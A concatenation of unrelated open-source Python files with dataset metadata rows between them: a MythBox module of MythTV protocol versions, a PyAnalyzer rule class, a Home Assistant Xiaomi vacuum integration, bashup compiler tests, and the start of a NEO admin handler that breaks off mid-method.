def emptyRecordFields(self):
return ['episode','inetref','season']
def protocolToken(self):
return ""
class Protocol40(BaseProtocol):
def version(self):
return 40
def mythVersion(self):
return '0.21'
def recordFields(self):
# Based on from https://github.com/MythTV/mythtv/blob/v0.23.1/mythtv/bindings/python/MythTV/MythData.py
return [ 'title', 'subtitle', 'description',
'category', 'chanid', 'channum',
'callsign', 'channame', 'filename',
'fs_high', 'fs_low', 'starttime',
'endtime', 'duplicate', 'shareable',
'findid', 'hostname', 'sourceid',
'cardid', 'inputid', 'recpriority',
'recstatus', 'recordid', 'rectype',
'dupin', 'dupmethod', 'recstartts',
'recendts', 'repeat', 'programflags',
'recgroup', 'commfree', 'outputfilters',
'seriesid', 'programid', 'lastmodified',
'stars', 'airdate', 'hasairdate',
'playgroup', 'recpriority2', 'parentid',
'storagegroup', 'audio_props', 'video_props',
'subtitle_type']
def hasOriginalAirDate(self, program):
return int(program._data['hasairdate']) == 1
def tvState(self):
return TVState
def buildAnnounceFileTransferCommand(self, hostname, filePath):
return ["ANN FileTransfer %s" % hostname, filePath]
def buildRescheduleRequest(self, scheduleId):
return ['RESCHEDULE_RECORDINGS %s' % scheduleId]
def getLiveTvBrain(self, settings, translator):
from mythbox.ui.livetv import MythLiveTvBrain
return MythLiveTvBrain(settings, translator)
def getFileSize(self, program):
return self.decodeLongLong(int(program._data['fs_low']), int(program._data['fs_high'])) / 1024.0
def genPixMapCommand(self):
return ['QUERY_GENPIXMAP']
def genQueryRecordingsCommand(self):
return ['QUERY_RECORDINGS Play']
def genPixMapPreviewFilename(self, program):
return program.getBareFilename() + '.640x360.png'
def supportsStreaming(self, platform):
return True
def readLong(self, reply, remove=False):
d = self.decodeLongLong(int(reply[1]), int(reply[0]))
if remove:
reply.pop(0)
reply.pop(0)
return d
def writeLong(self, d, request):
low, high = self.encodeLongLong(d)
request.append('%d' % high)
request.append('%d' % low)
def decodeLongLong(self, low32Bits, high32Bits):
"""
@type low32Bits: int or str
@type high32Bits: int or str
@return: Decodes two 32bit ints to a 64bit long
@rtype: long
"""
if isinstance(low32Bits, basestring):
low32Bits = long(low32Bits)
if isinstance(high32Bits, basestring):
high32Bits = long(high32Bits)
return low32Bits & 0xffffffffL | (high32Bits << 32)
def encodeLongLong(self, long64Bits):
"""
@rtype: (low32Bits, high32Bits)
@return: Encodes 64bit long into pair of 32 bit ints
"""
return long64Bits & 0xffffffffL, long64Bits >> 32
class Protocol41(Protocol40):
def version(self):
return 41
class Protocol42(Protocol41):
def version(self):
return 42
class Protocol43(Protocol42):
def version(self):
return 43
def recordFields(self):
# Copied from https://github.com/MythTV/mythtv/blob/v0.23.1/mythtv/bindings/python/MythTV/MythData.py
return [ 'title', 'subtitle', 'description',
'category', 'chanid', 'channum',
'callsign', 'channame', 'filename',
'fs_high', 'fs_low', 'starttime',
'endtime', 'duplicate', 'shareable',
'findid', 'hostname', 'sourceid',
'cardid', 'inputid', 'recpriority',
'recstatus', 'recordid', 'rectype',
'dupin', 'dupmethod', 'recstartts',
'recendts', 'repeat', 'programflags',
'recgroup', 'commfree', 'outputfilters',
'seriesid', 'programid', 'lastmodified',
'stars', 'airdate', 'hasairdate',
'playgroup', 'recpriority2', 'parentid',
'storagegroup', 'audio_props', 'video_props',
'subtitle_type','year']
class Protocol44(Protocol43):
def version(self):
return 44
def tvState(self):
return TVState44
class Protocol45(Protocol44):
def version(self):
return 45
def buildAnnounceFileTransferCommand(self, hostname, filePath):
# TODO: Storage group should be non-empty for recordings
storageGroup = ''
return ['ANN FileTransfer %s' % hostname, filePath, storageGroup]
class Protocol46(Protocol45):
def version(self):
return 46
class Protocol47(Protocol46):
def version(self):
return 47
class Protocol48(Protocol47):
def version(self):
return 48
class Protocol49(Protocol48):
def version(self):
return 49
class Protocol50(Protocol49):
def version(self):
return 50
def mythVersion(self):
return '0.22'
class Protocol56(Protocol50):
def version(self):
return 56
def mythVersion(self):
return '0.23'
class Protocol23056(Protocol56):
def version(self):
return 23056
def mythVersion(self):
return '0.23.1'
class Protocol57(Protocol56):
def version(self):
return 57
def mythVersion(self):
return '0.24'
def recordFields(self):#
return ['title','subtitle','description',
'category','chanid','channum',
'callsign','channame','filename',
'filesize','starttime','endtime',
'findid','hostname','sourceid',
'cardid','inputid','recpriority',
'recstatus','recordid','rectype',
'dupin','dupmethod','recstartts',
'recendts','programflags','recgroup',
'outputfilters','seriesid','programid',
'lastmodified','stars','airdate',
'playgroup','recpriority2','parentid',
'storagegroup','audio_props','video_props',
'subtitle_type','year']
def hasOriginalAirDate(self, program):
d = program.originalAirDate()
return d and '-' in d
def buildAnnounceFileTransferCommand(self, hostname, filePath):
return ["ANN FileTransfer %s 0" % hostname, filePath, 'Default']
def getFileSize(self, program):
return int(program._data['filesize']) / 1024.0
def supportsStreaming(self, platform):
# Eden and up
return platform.xbmcVersion() >= 11.0
class Protocol58(Protocol57):
def tvState(self):
return TVState58
def version(self):
return 58
class Protocol59(Protocol58):
def version(self):
return 59
class Protocol60(Protocol59):
def version(self):
return 60
def buildAnnounceFileTransferCommand(self, hostname, filePath):
return ["ANN FileTransfer %s 0 1 10000" % hostname, filePath, 'Default']
def genPixMapCommand(self):
return ['QUERY_GENPIXMAP2', 'do_not_care']
def genPixMapPreviewFilename(self, program):
return '<EMPTY>'
class Protocol61(Protocol60):
def version(self):
return 61
class Protocol62(Protocol61):
def version(self):
return 62
def protocolToken(self):
return "78B5631E"
class Protocol63(Protocol62):
def version(self):
return 63
def protocolToken(self):
return "3875641D"
class Protocol64(Protocol63):
def version(self):
return 64
def protocolToken(self):
return "8675309J"
class Protocol65(Protocol64):
def version(self):
return 65
def protocolToken(self):
return "D2BB94C2"
def genQueryRecordingsCommand(self):
# technically the old query recs command works but actually causes sorting which would be redundant and may be removed in the future
return ['QUERY_RECORDINGS Unsorted']
class Protocol66(Protocol65):
def version(self):
return 66
def protocolToken(self):
return "0C0FFEE0"
def readLong(self, reply, remove=False):
d = long(reply[0])
if remove:
reply.pop(0)
return d
def writeLong(self, d, request):
request.append('%d' % long(d))
class Protocol67(Protocol66):
def version(self):
return 67
def protocolToken(self):
return "0G0G0G0"
def recordFields(self):
# Copied from mythtv/mythtv/bindings/python/MythTV/mythproto.py
return ['title', 'subtitle', 'description',
'season', 'episode', 'category',
'chanid', 'channum', 'callsign',
'channame', 'filename', 'filesize',
'starttime', 'endtime', 'findid',
'hostname', 'sourceid', 'cardid',
'inputid', 'recpriority', 'recstatus',
'recordid', 'rectype', 'dupin',
'dupmethod', 'recstartts', 'recendts',
'programflags', 'recgroup', 'outputfilters',
'seriesid', 'programid', 'inetref',
'lastmodified', 'stars', 'airdate',
'playgroup', 'recpriority2', 'parentid',
'storagegroup', 'audio_props', 'video_props',
'subtitle_type','year']
class Protocol68(Protocol67):
def version(self):
return 68
def protocolToken(self):
return "90094EAD"
class Protocol69(Protocol68):
def version(self):
return 69
def protocolToken(self):
return "63835135"
class Protocol70(Protocol69):
def version(self):
return 70
def protocolToken(self):
return "53153836"
class Protocol71(Protocol70):
def version(self):
return 71
def protocolToken(self):
return "05e82186"
class Protocol72(Protocol71):
def version(self):
return 72
def protocolToken(self):
return "D78EFD6F"
class Protocol73(Protocol72):
def version(self):
return 73
def protocolToken(self):
return "D7FE8D6F"
def buildRescheduleRequest(self, scheduleId):
if scheduleId == 0:
return ['RESCHEDULE_RECORDINGS CHECK 0 0 0 MythBoxFrontend **any**']
else:
if scheduleId == -1:
scheduleId = 0
return ['RESCHEDULE_RECORDINGS MATCH %s 0 0 - MythBoxFrontend' % scheduleId]
class Protocol74(Protocol73):
def version(self):
return 74
def protocolToken(self):
return "SingingPotato"
# Current rev in mythversion.h
protocols = {
40: Protocol40(), # 0.21
41: Protocol41(),
42: Protocol42(),
43: Protocol43(),
44: Protocol44(),
45: Protocol45(),
46: Protocol46(),
47: Protocol47(),
48: Protocol48(),
49: Protocol49(),
50: Protocol50(), # 0.22
56: Protocol56(), # 0.23
23056: Protocol23056(), # 0.23.1 - mythbuntu weirdness
57: Protocol57(), # 0.24
58: Protocol58(), # 0.24
59: Protocol59(), # 0.24
60: Protocol60(), # 0.24
61: Protocol61(), # 0.24
62: Protocol62(), # 0.24
63: Protocol63(), # 0.24
64: Protocol64(), # 0.25
65: Protocol65(), # 0.25
66: Protocol66(), # 0.25
67: Protocol67(), # 0.25
68: Protocol68(), # 0.25 - VIDEO_LIST_UPDATE
69: Protocol69(), # 0.25 - QUERY_FILE_HASH
70: Protocol70(), # 0.25 - REOPEN
71: Protocol71(), # 0.25 - ASK_RECORDING GET_FREE_INPUTS
72: Protocol72(), # 0.25 - QUERY_ACTIVE_BACKENDS
73: Protocol73(), # 0.26 - RESCHEDULE_RECORDINGS
74: Protocol74() # 0.26
}
| gpl-2.0 | -5,766,141,552,974,468,000 | 26.119374 | 140 | 0.571655 | false |
jffm/pyanalyzer | core/rule.py | 1 | 2373 | # Copyright (c) 2008-2009 Junior (Frederic) FLEURIAL MONFILS
#
# This file is part of PyAnalyzer.
#
# PyAnalyzer is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# or see <http://www.opensource.org/licenses/gpl-3.0.html>
#
# Contact:
# Junior FLEURIAL MONFILS <frederic dot fleurialmonfils at cetic dot be>
__author__ = "Frederic F. MONFILS"
__version__ = "$Revision: $".split()[1]
__revision__ = __version__
# $Source: $
__date__ = "$Date: $"
__copyright__ = "Copyright (c) 2008-2009 Junior (Frederic) FLEURIAL MONFILS"
__license__ = "GPLv3"
__contact__ = "ffm at cetic.be"
"""This module implements a Rule
"""
import sys
import compiler
from core.metric import Metric
from core.writer.sqlwriter import SqlWriter
from core.writer.textwriter import TextWriter
class Rule(Metric):
"""A Rule is a Metric that is directly printed to stderr
"""
class config:
severity = None
code = 0
message = None
def __init__(self, writer):
self.writer = writer
self.row = dict(
(key,value)
for (key,value) in self.config.__dict__.items()
if not key.startswith("__"))
self.row.update(
code="%s%04d" % (self.config.severity[0].upper(), self.config.code),
message=self.__doc__.split("\n")[0]
)
def report(self, node, mapping):
self.row.update(
kind=node.__class__.__name__,
filename=self.filename,
name=getattr(node, "name", ""),
lineno=node.lineno,
message=self.row["message"] % mapping)
self.writer.writerow(self.row)
def visitModule(self, node, *args):
self.filename = node.filename
self.default(node, *args)
| gpl-3.0 | -3,664,105,495,476,861,400 | 33.41791 | 80 | 0.626633 | false |
leppa/home-assistant | homeassistant/components/xiaomi_miio/vacuum.py | 1 | 15770 | """Support for the Xiaomi vacuum cleaner robot."""
import asyncio
from functools import partial
import logging
from miio import DeviceException, Vacuum # pylint: disable=import-error
import voluptuous as vol
from homeassistant.components.vacuum import (
ATTR_CLEANED_AREA,
PLATFORM_SCHEMA,
STATE_CLEANING,
STATE_DOCKED,
STATE_ERROR,
STATE_IDLE,
STATE_PAUSED,
STATE_RETURNING,
SUPPORT_BATTERY,
SUPPORT_CLEAN_SPOT,
SUPPORT_FAN_SPEED,
SUPPORT_LOCATE,
SUPPORT_PAUSE,
SUPPORT_RETURN_HOME,
SUPPORT_SEND_COMMAND,
SUPPORT_START,
SUPPORT_STATE,
SUPPORT_STOP,
StateVacuumDevice,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_HOST,
CONF_NAME,
CONF_TOKEN,
STATE_OFF,
STATE_ON,
)
import homeassistant.helpers.config_validation as cv
from .const import (
DOMAIN,
SERVICE_CLEAN_ZONE,
SERVICE_MOVE_REMOTE_CONTROL,
SERVICE_MOVE_REMOTE_CONTROL_STEP,
SERVICE_START_REMOTE_CONTROL,
SERVICE_STOP_REMOTE_CONTROL,
)
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "Xiaomi Vacuum cleaner"
DATA_KEY = "vacuum.xiaomi_miio"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
},
extra=vol.ALLOW_EXTRA,
)
FAN_SPEEDS = {"Quiet": 38, "Balanced": 60, "Turbo": 77, "Max": 90, "Gentle": 105}
ATTR_CLEAN_START = "clean_start"
ATTR_CLEAN_STOP = "clean_stop"
ATTR_CLEANING_TIME = "cleaning_time"
ATTR_DO_NOT_DISTURB = "do_not_disturb"
ATTR_DO_NOT_DISTURB_START = "do_not_disturb_start"
ATTR_DO_NOT_DISTURB_END = "do_not_disturb_end"
ATTR_MAIN_BRUSH_LEFT = "main_brush_left"
ATTR_SIDE_BRUSH_LEFT = "side_brush_left"
ATTR_FILTER_LEFT = "filter_left"
ATTR_SENSOR_DIRTY_LEFT = "sensor_dirty_left"
ATTR_CLEANING_COUNT = "cleaning_count"
ATTR_CLEANED_TOTAL_AREA = "total_cleaned_area"
ATTR_CLEANING_TOTAL_TIME = "total_cleaning_time"
ATTR_ERROR = "error"
ATTR_RC_DURATION = "duration"
ATTR_RC_ROTATION = "rotation"
ATTR_RC_VELOCITY = "velocity"
ATTR_STATUS = "status"
ATTR_ZONE_ARRAY = "zone"
ATTR_ZONE_REPEATER = "repeats"
VACUUM_SERVICE_SCHEMA = vol.Schema({vol.Optional(ATTR_ENTITY_ID): cv.comp_entity_ids})
SERVICE_SCHEMA_REMOTE_CONTROL = VACUUM_SERVICE_SCHEMA.extend(
{
vol.Optional(ATTR_RC_VELOCITY): vol.All(
vol.Coerce(float), vol.Clamp(min=-0.29, max=0.29)
),
vol.Optional(ATTR_RC_ROTATION): vol.All(
vol.Coerce(int), vol.Clamp(min=-179, max=179)
),
vol.Optional(ATTR_RC_DURATION): cv.positive_int,
}
)
SERVICE_SCHEMA_CLEAN_ZONE = VACUUM_SERVICE_SCHEMA.extend(
{
vol.Required(ATTR_ZONE_ARRAY): vol.All(
list,
[
vol.ExactSequence(
[vol.Coerce(int), vol.Coerce(int), vol.Coerce(int), vol.Coerce(int)]
)
],
),
vol.Required(ATTR_ZONE_REPEATER): vol.All(
vol.Coerce(int), vol.Clamp(min=1, max=3)
),
}
)
SERVICE_SCHEMA_CLEAN_ZONE = VACUUM_SERVICE_SCHEMA.extend(
{
vol.Required(ATTR_ZONE_ARRAY): vol.All(
list,
[
vol.ExactSequence(
[vol.Coerce(int), vol.Coerce(int), vol.Coerce(int), vol.Coerce(int)]
)
],
),
vol.Required(ATTR_ZONE_REPEATER): vol.All(
vol.Coerce(int), vol.Clamp(min=1, max=3)
),
}
)
SERVICE_TO_METHOD = {
SERVICE_START_REMOTE_CONTROL: {"method": "async_remote_control_start"},
SERVICE_STOP_REMOTE_CONTROL: {"method": "async_remote_control_stop"},
SERVICE_MOVE_REMOTE_CONTROL: {
"method": "async_remote_control_move",
"schema": SERVICE_SCHEMA_REMOTE_CONTROL,
},
SERVICE_MOVE_REMOTE_CONTROL_STEP: {
"method": "async_remote_control_move_step",
"schema": SERVICE_SCHEMA_REMOTE_CONTROL,
},
SERVICE_CLEAN_ZONE: {
"method": "async_clean_zone",
"schema": SERVICE_SCHEMA_CLEAN_ZONE,
},
}
SUPPORT_XIAOMI = (
SUPPORT_STATE
| SUPPORT_PAUSE
| SUPPORT_STOP
| SUPPORT_RETURN_HOME
| SUPPORT_FAN_SPEED
| SUPPORT_SEND_COMMAND
| SUPPORT_LOCATE
| SUPPORT_BATTERY
| SUPPORT_CLEAN_SPOT
| SUPPORT_START
)
STATE_CODE_TO_STATE = {
2: STATE_IDLE,
3: STATE_IDLE,
5: STATE_CLEANING,
6: STATE_RETURNING,
7: STATE_CLEANING,
8: STATE_DOCKED,
9: STATE_ERROR,
10: STATE_PAUSED,
11: STATE_CLEANING,
12: STATE_ERROR,
15: STATE_RETURNING,
16: STATE_CLEANING,
17: STATE_CLEANING,
18: STATE_CLEANING,
}
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the Xiaomi vacuum cleaner robot platform."""
if DATA_KEY not in hass.data:
hass.data[DATA_KEY] = {}
host = config[CONF_HOST]
token = config[CONF_TOKEN]
name = config[CONF_NAME]
# Create handler
_LOGGER.info("Initializing with host %s (token %s...)", host, token[:5])
vacuum = Vacuum(host, token)
mirobo = MiroboVacuum(name, vacuum)
hass.data[DATA_KEY][host] = mirobo
async_add_entities([mirobo], update_before_add=True)
async def async_service_handler(service):
"""Map services to methods on MiroboVacuum."""
method = SERVICE_TO_METHOD.get(service.service)
params = {
key: value for key, value in service.data.items() if key != ATTR_ENTITY_ID
}
entity_ids = service.data.get(ATTR_ENTITY_ID)
if entity_ids:
target_vacuums = [
vac
for vac in hass.data[DATA_KEY].values()
if vac.entity_id in entity_ids
]
else:
target_vacuums = hass.data[DATA_KEY].values()
update_tasks = []
for vacuum in target_vacuums:
await getattr(vacuum, method["method"])(**params)
for vacuum in target_vacuums:
update_coro = vacuum.async_update_ha_state(True)
update_tasks.append(update_coro)
if update_tasks:
await asyncio.wait(update_tasks)
for vacuum_service in SERVICE_TO_METHOD:
schema = SERVICE_TO_METHOD[vacuum_service].get("schema", VACUUM_SERVICE_SCHEMA)
hass.services.async_register(
DOMAIN, vacuum_service, async_service_handler, schema=schema
)
class MiroboVacuum(StateVacuumDevice):
"""Representation of a Xiaomi Vacuum cleaner robot."""
def __init__(self, name, vacuum):
"""Initialize the Xiaomi vacuum cleaner robot handler."""
self._name = name
self._vacuum = vacuum
self.vacuum_state = None
self._available = False
self.consumable_state = None
self.clean_history = None
self.dnd_state = None
self.last_clean = None
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the status of the vacuum cleaner."""
if self.vacuum_state is not None:
# The vacuum reverts back to an idle state after erroring out.
# We want to keep returning an error until it has been cleared.
if self.vacuum_state.got_error:
return STATE_ERROR
try:
return STATE_CODE_TO_STATE[int(self.vacuum_state.state_code)]
except KeyError:
_LOGGER.error(
"STATE not supported: %s, state_code: %s",
self.vacuum_state.state,
self.vacuum_state.state_code,
)
return None
@property
def battery_level(self):
"""Return the battery level of the vacuum cleaner."""
if self.vacuum_state is not None:
return self.vacuum_state.battery
@property
def fan_speed(self):
"""Return the fan speed of the vacuum cleaner."""
if self.vacuum_state is not None:
speed = self.vacuum_state.fanspeed
if speed in FAN_SPEEDS.values():
return [key for key, value in FAN_SPEEDS.items() if value == speed][0]
return speed
@property
def fan_speed_list(self):
"""Get the list of available fan speed steps of the vacuum cleaner."""
return list(sorted(FAN_SPEEDS.keys(), key=lambda s: FAN_SPEEDS[s]))
@property
def device_state_attributes(self):
"""Return the specific state attributes of this vacuum cleaner."""
attrs = {}
if self.vacuum_state is not None:
attrs.update(
{
ATTR_DO_NOT_DISTURB: STATE_ON
if self.dnd_state.enabled
else STATE_OFF,
ATTR_DO_NOT_DISTURB_START: str(self.dnd_state.start),
ATTR_DO_NOT_DISTURB_END: str(self.dnd_state.end),
# Not working --> 'Cleaning mode':
# STATE_ON if self.vacuum_state.in_cleaning else STATE_OFF,
ATTR_CLEANING_TIME: int(
self.vacuum_state.clean_time.total_seconds() / 60
),
ATTR_CLEANED_AREA: int(self.vacuum_state.clean_area),
ATTR_CLEANING_COUNT: int(self.clean_history.count),
ATTR_CLEANED_TOTAL_AREA: int(self.clean_history.total_area),
ATTR_CLEANING_TOTAL_TIME: int(
self.clean_history.total_duration.total_seconds() / 60
),
ATTR_MAIN_BRUSH_LEFT: int(
self.consumable_state.main_brush_left.total_seconds() / 3600
),
ATTR_SIDE_BRUSH_LEFT: int(
self.consumable_state.side_brush_left.total_seconds() / 3600
),
ATTR_FILTER_LEFT: int(
self.consumable_state.filter_left.total_seconds() / 3600
),
ATTR_SENSOR_DIRTY_LEFT: int(
self.consumable_state.sensor_dirty_left.total_seconds() / 3600
),
ATTR_STATUS: str(self.vacuum_state.state),
}
)
if self.last_clean:
attrs[ATTR_CLEAN_START] = self.last_clean.start
attrs[ATTR_CLEAN_STOP] = self.last_clean.end
if self.vacuum_state.got_error:
attrs[ATTR_ERROR] = self.vacuum_state.error
return attrs
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._available
@property
def supported_features(self):
"""Flag vacuum cleaner robot features that are supported."""
return SUPPORT_XIAOMI
async def _try_command(self, mask_error, func, *args, **kwargs):
"""Call a vacuum command handling error messages."""
try:
await self.hass.async_add_executor_job(partial(func, *args, **kwargs))
return True
except DeviceException as exc:
_LOGGER.error(mask_error, exc)
return False
async def async_start(self):
"""Start or resume the cleaning task."""
await self._try_command(
"Unable to start the vacuum: %s", self._vacuum.resume_or_start
)
async def async_pause(self):
"""Pause the cleaning task."""
await self._try_command("Unable to set start/pause: %s", self._vacuum.pause)
async def async_stop(self, **kwargs):
"""Stop the vacuum cleaner."""
await self._try_command("Unable to stop: %s", self._vacuum.stop)
async def async_set_fan_speed(self, fan_speed, **kwargs):
"""Set fan speed."""
if fan_speed.capitalize() in FAN_SPEEDS:
fan_speed = FAN_SPEEDS[fan_speed.capitalize()]
else:
try:
fan_speed = int(fan_speed)
except ValueError as exc:
_LOGGER.error(
"Fan speed step not recognized (%s). " "Valid speeds are: %s",
exc,
self.fan_speed_list,
)
return
await self._try_command(
"Unable to set fan speed: %s", self._vacuum.set_fan_speed, fan_speed
)
async def async_return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock."""
await self._try_command("Unable to return home: %s", self._vacuum.home)
async def async_clean_spot(self, **kwargs):
"""Perform a spot clean-up."""
await self._try_command(
"Unable to start the vacuum for a spot clean-up: %s", self._vacuum.spot
)
async def async_locate(self, **kwargs):
"""Locate the vacuum cleaner."""
await self._try_command("Unable to locate the botvac: %s", self._vacuum.find)
async def async_send_command(self, command, params=None, **kwargs):
"""Send raw command."""
await self._try_command(
"Unable to send command to the vacuum: %s",
self._vacuum.raw_command,
command,
params,
)
async def async_remote_control_start(self):
"""Start remote control mode."""
await self._try_command(
"Unable to start remote control the vacuum: %s", self._vacuum.manual_start
)
async def async_remote_control_stop(self):
"""Stop remote control mode."""
await self._try_command(
"Unable to stop remote control the vacuum: %s", self._vacuum.manual_stop
)
async def async_remote_control_move(
self, rotation: int = 0, velocity: float = 0.3, duration: int = 1500
):
"""Move vacuum with remote control mode."""
await self._try_command(
"Unable to move with remote control the vacuum: %s",
self._vacuum.manual_control,
velocity=velocity,
rotation=rotation,
duration=duration,
)
async def async_remote_control_move_step(
self, rotation: int = 0, velocity: float = 0.2, duration: int = 1500
):
"""Move vacuum one step with remote control mode."""
await self._try_command(
"Unable to remote control the vacuum: %s",
self._vacuum.manual_control_once,
velocity=velocity,
rotation=rotation,
duration=duration,
)
def update(self):
"""Fetch state from the device."""
try:
state = self._vacuum.status()
self.vacuum_state = state
self.consumable_state = self._vacuum.consumable_status()
self.clean_history = self._vacuum.clean_history()
self.last_clean = self._vacuum.last_clean_details()
self.dnd_state = self._vacuum.dnd_status()
self._available = True
except OSError as exc:
_LOGGER.error("Got OSError while fetching the state: %s", exc)
except DeviceException as exc:
_LOGGER.warning("Got exception while fetching the state: %s", exc)
async def async_clean_zone(self, zone, repeats=1):
"""Clean selected area for the number of repeats indicated."""
for _zone in zone:
_zone.append(repeats)
_LOGGER.debug("Zone with repeats: %s", zone)
try:
await self.hass.async_add_executor_job(self._vacuum.zoned_clean, zone)
except (OSError, DeviceException) as exc:
_LOGGER.error("Unable to send zoned_clean command to the vacuum: %s", exc)
| apache-2.0 | 5,748,690,026,502,680,000 | 32.2 | 88 | 0.58104 | false |
themattrix/bashup | bashup/test/test_bashup.py | 1 | 6069 | import subprocess
import os
import itertools
import textwrap
import pathlib2 as pathlib
import pytest
import temporary
from .. import test
# Compile some bashup and run it against multiple versions of bash. The versions are expected to be found in
# $BASH_VERSIONS_DIR. If none are found, or the environment variable is not set, the tests are skipped.
def test_compiled_bash(): # pragma: no cover
bash_binaries = __find_bash_binaries()
if not bash_binaries:
pytest.skip('bash executable not found')
for bash_binary in bash_binaries:
yield __assert_compiled_bash, bash_binary, __BASHUP_STR, __EXPECTED_OUTPUT, 55
# Compile some bashup and run it! This will only work if bash exists on the system. Otherwise the test is skipped.
def test_direct_run(): # pragma: no cover
if not __is_bash_in_path():
pytest.skip('bash executable not found')
if not __is_bashup_in_path():
pytest.skip('bashup executable not found')
with temporary.temp_file(__BASHUP_STR) as in_file:
p = subprocess.Popen(
args=('bashup', '--run', str(in_file)),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = [o.decode('utf-8').strip() for o in p.communicate()]
test.assert_eq(stdout, __EXPECTED_OUTPUT)
assert p.returncode == 55
def test_docopt(): # pragma: no cover
bash_binaries = __find_bash_binaries()
if not bash_binaries:
pytest.skip('bash executable not found')
docopt_str = textwrap.dedent("""
#!/bin/bash
#
# Naval Fate.
#
# Usage:
# naval_fate ship new <name>...
# naval_fate ship <name> move <x> <y> [--speed=<kn>]
# naval_fate ship shoot <x> <y>
# naval_fate mine (set|remove) <x> <y> [--moored|--drifting]
# naval_fate -h | --help
# naval_fate --version
#
# Options:
# -h --help Show this screen.
# --version Show version.
# --speed=<kn> Speed in knots [default: 10].
# --moored Moored (anchored) mine.
# --drifting Drifting mine.
#
# Version:
# Naval Fate 2.0
args=("${@}")
printf '%s\n' 'args=('
for i in "${!args[@]}"; do
printf ' [%q]=%q\n' "${i}" "${args[${i}]}"
done
printf ')\n'
""").strip()
expected_return_code = 0
# @fn main {
# @echo @args
# }
#
# @sourced || {
# @docopt
# main
# }
args_and_expected_output = (
(('ship', 'new', ' ship name'),
textwrap.dedent("""
args=(
[0]=ship
[1]=new
[2]=\\ \\ ship\\ \\ name
)
""").strip()),
(('ship', ' ship name', 'move', '-100', '200', '--speed=5.5'),
textwrap.dedent("""
args=(
[0]=ship
[1]=\\ \\ ship\\ \\ name
[2]=move
[3]=-100
[4]=200
[5]=--speed=5.5
)
""").strip()),
)
parameters = itertools.product(bash_binaries, args_and_expected_output)
for bash_binary, (script_args, expected_output) in parameters:
yield __assert_compiled_bash, bash_binary, docopt_str, expected_output, expected_return_code, script_args
#
# Test Helpers
#
__BASHUP_STR = textwrap.dedent("""
#!/bin/bash
@fn hi greeting='Hello', target='World' {
echo "${greeting}, ${target}!$@"
}
# We could do this with grep, but this way is pure bash.
@fn filter regex {
while read line; do
if [[ ${line} =~ ${regex} ]]; then
echo "${line}"
fi
done
}
# Ensure that default parameters work and can be overridden.
hi
hi --target="Human"
hi --greeting="Greetings"
hi --greeting="Greetings" --target="Human"
hi --greeting="Greetings" --target="Human" " Have" "fun!"
# Ensure that piping between fns works.
{
hi --greeting="What now" --target="Human?"
hi --greeting="Welcome" --target="Cyborg"
hi --greeting="Hi" --target="human"
} | filter --regex="[Hh]uman"
exit 55
""").strip()
__EXPECTED_OUTPUT = '\n'.join((
'Hello, World!',
'Hello, Human!',
'Greetings, World!',
'Greetings, Human!',
'Greetings, Human! Have fun!',
'What now, Human?!',
'Hi, human!'))
def __find_bash_binaries():
try:
return tuple((str(p) for p in pathlib.Path(os.environ['BASH_VERSIONS_DIR']).glob('bash*')))
except KeyError: # pragma: no cover
return () # pragma: no cover
def __is_bash_in_path():
try:
subprocess.check_call(('bash', '-c', ':'))
return True # pragma: no cover
except (subprocess.CalledProcessError, OSError): # pragma: no cover
return False # pragma: no cover
def __is_bashup_in_path():
try:
subprocess.check_call(('bashup', '--version'))
return True # pragma: no cover
except (subprocess.CalledProcessError, OSError): # pragma: no cover
return False # pragma: no cover
@temporary.in_temp_dir()
def __assert_compiled_bash(
bash_binary,
bashup_str,
expected_output,
expected_return_code,
script_args=()): # pragma: no cover
with temporary.temp_file(bashup_str) as in_file:
subprocess.check_call(args=(
'bashup',
'--in', str(in_file),
'--out', 'out.sh'))
p = subprocess.Popen(
args=(bash_binary, 'out.sh') + tuple(script_args),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = [o.decode('UTF-8').strip() for o in p.communicate()]
test.assert_eq(stdout, expected_output)
assert p.returncode == expected_return_code
| mit | 6,559,511,140,477,054,000 | 27.097222 | 114 | 0.526116 | false |
vpelletier/neoppod | neo/admin/handler.py | 1 | 5095 | #
# Copyright (C) 2009-2016 Nexedi SA
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from neo.lib import logging, protocol
from neo.lib.handler import EventHandler
from neo.lib.protocol import uuid_str, Packets
from neo.lib.exception import PrimaryFailure
def check_primary_master(func):
def wrapper(self, *args, **kw):
if self.app.bootstrapped:
return func(self, *args, **kw)
raise protocol.NotReadyError('Not connected to a primary master.')
return wrapper
def forward_ask(klass):
return check_primary_master(lambda self, conn, *args, **kw:
self.app.master_conn.ask(klass(*args, **kw),
conn=conn, msg_id=conn.getPeerId()))
class AdminEventHandler(EventHandler):
"""This class deals with events for administrating cluster."""
@check_primary_master
def askPartitionList(self, conn, min_offset, max_offset, uuid):
logging.info("ask partition list from %s to %s for %s",
min_offset, max_offset, uuid_str(uuid))
self.app.sendPartitionTable(conn, min_offset, max_offset, uuid)
@check_primary_master
def askNodeList(self, conn, node_type):
if node_type is None:
node_type = 'all'
node_filter = None
else:
